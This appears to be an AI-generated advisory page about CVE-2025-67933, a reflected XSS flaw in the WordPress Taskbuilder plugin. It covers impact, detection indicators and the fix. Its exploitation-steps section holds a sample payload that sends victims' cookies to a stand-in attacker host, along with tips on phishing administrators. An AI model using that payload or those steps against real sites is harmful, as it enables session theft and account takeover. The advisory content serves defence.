CVE-2025-67933: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-67933 is a Reflected Cross-Site Scripting (XSS) vulnerability in the WordPress Taskbuilder plugin, classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). It affects all versions of the Taskbuilder plugin up to and including 4.0.9, with version 5.0.0 being the first patched release. The vulnerability was reported by researcher Skalucy on October 23, 2025, and publicly disclosed by Patchstack on January 6, 2026, with the CVE record published on January 8, 2026. The CVSS v3.1 base score is 7.1 (High) as assessed by Patchstack (CNA), with no NVD enrichment provided (Patchstack).

Technical details

The vulnerability is rooted in insufficient input sanitization and output encoding within the Taskbuilder WordPress plugin, allowing attacker-controlled input to be reflected back in the generated web page without proper neutralization (CWE-79). This is a Reflected XSS attack vector, meaning malicious JavaScript payloads are embedded in a crafted URL or request and executed in the victim's browser when they interact with the link. Exploitation requires no authentication (unauthenticated attacker) but does require user interaction — specifically, a privileged user must click a malicious link or visit a crafted page. No public proof-of-concept code has been identified at this time (Patchstack).

Impact

Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the context of a victim user's browser session on the affected WordPress site. This can lead to session token theft, credential harvesting, unauthorized actions performed on behalf of the victim (such as administrative actions if an admin is targeted), and delivery of malicious redirects or advertisements to site visitors. The CVSS scope is marked as "Changed," indicating that the impact extends beyond the vulnerable component to the user's browser environment (Patchstack).

Exploitability

No active in-the-wild exploitation has been confirmed for CVE-2025-67933, and it is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. However, Patchstack notes that vulnerabilities of this class are commonly used in mass-exploit campaigns targeting WordPress plugins across thousands of sites regardless of traffic or popularity. No public exploit code or threat actor attribution has been identified (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Taskbuilder plugin at version 4.0.9 or earlier using tools like WPScan, Shodan, or by inspecting plugin metadata in publicly accessible WordPress installations.
  2. Craft malicious URL: Construct a URL targeting the vulnerable Taskbuilder plugin endpoint that includes a reflected XSS payload in a query parameter (e.g., https://target-site.com/?taskbuilder_param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).
  3. Deliver payload: Send the crafted URL to a target user (preferably a WordPress administrator) via phishing email, social engineering, or embedding in a forum/comment.
  4. Victim interaction: When the victim clicks the link and loads the page, the malicious script is reflected from the server and executed in their browser.
  5. Achieve objective: The executed script can steal session cookies, capture credentials, perform actions on the WordPress admin panel on behalf of the victim, or redirect the user to a malicious site (Patchstack).

Indicators of compromise

  • Network: HTTP requests to WordPress pages with Taskbuilder plugin parameters containing encoded JavaScript payloads (e.g., <script>, %3Cscript%3E, javascript:, onerror=, onload=) in URL query strings.
  • Logs: WordPress or web server access logs showing GET/POST requests to Taskbuilder plugin endpoints with suspicious parameter values containing HTML or JavaScript fragments; unusual outbound requests from victim browsers to unknown external domains shortly after visiting the site.
  • Browser/Session: Unexpected session invalidation or new admin accounts created without authorization; admin actions (plugin installs, user creation) not initiated by legitimate users.
  • File System: New or modified PHP files in the WordPress installation directory, particularly in wp-content/plugins/taskbuilder/, which may indicate follow-on compromise after XSS-based session hijacking.

Mitigation and workarounds

The primary remediation is to update the Taskbuilder WordPress plugin to version 5.0.0 or later, which contains the fix for this vulnerability (Patchstack). For sites unable to update immediately, Patchstack has issued a virtual patching/mitigation rule available to Patchstack subscribers that blocks exploitation attempts without requiring a plugin update. As a general precaution, administrators should avoid clicking unsolicited links while logged into WordPress, and consider implementing a Web Application Firewall (WAF) to filter reflected XSS payloads.

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management